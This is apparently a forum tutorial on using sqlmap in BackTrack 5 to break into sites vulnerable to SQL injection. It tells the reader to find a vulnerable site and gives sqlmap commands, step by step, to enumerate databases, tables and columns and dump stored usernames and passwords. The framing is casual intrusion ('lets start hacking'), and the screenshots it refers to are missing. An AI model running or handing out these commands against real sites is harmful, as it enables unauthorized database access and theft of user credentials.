Hello again guyz :)
today I'm going to show you how to hack SQL Vuln. site with SQLmap in BackTrack 5
first of all find a Vuln. site, or test our own sites by adding a single quote in the end of our link => '
and I assume that you have basic knowledge about SQL injection before reading this tutorial :P
and I assume that you have basic knowledge about SQL injection before reading this tutorial :P
second of all open BackTrack > Terminal; then type
cd /pentest/database/sqlmaphit Enter.
Now we are inside SQLmap, lets start hacking :P
Now the command we will need here is:
-D <= define the database
-T <= define the table
-C <= define the column
--dbs <= bring DataBases names
--tables <= bring table names
--columns <=bring columns names
--dump <= dump the data out of the column
Lets start :)
our first command will be:
./sqlmap.py -u www.website.com/index.php?id=13 --dbs <= Example!it will look like:
then we will get the Databases names like:
now we will ask for tables from any of those databases with --tables
now we have to select the database with "-D" and ask for the tables with "--tables" :)
so we will type:
./sqlmap.py -u www.website.com/index.php?id=13 -D database_name --tablesI choose walnut_live database so I typed:
and the results will be the tables name of course :P
it will look like:
now we got the tables and found the users table!!
now we will select this table by "-T" command and ofcourse we already selected our database, so now we will write the same command, but we will replace "--tables" and put "-T" table_name which is "users" table and then ask for the columns inside that table by "--columns" command it will be like
./sqlmap.py -u www.website.com/index.php?id=13 -D database_name -T table_name --columnsit will look like:
now we will get the results, the columns
they will come like this:
as you can see we got "id, pass, and user" columns
now we want the data from them so we will dump the data :P with "--dump"
but in this one we have two ways to get them..
we can dump all the data at once, Or select the column and get the data from
I will show you how both of them look like and used..
first we can get all the data by this command:
./sqlmap.py -u www.website.com/index.php?id=13 -D database_name -T table_name --dumpwhich will get us all the data at once and will look like this:
and the result is:
In the picture I marked the user and pass :)
now we will try getting them one by one with this command:
./sqlmap.py -u www.website.com/index.php?id=13 -D database_name -T table_name -C column_name --dumpfor example I will get user and pass:
we are done!!
we got the User, and Password :)
have fun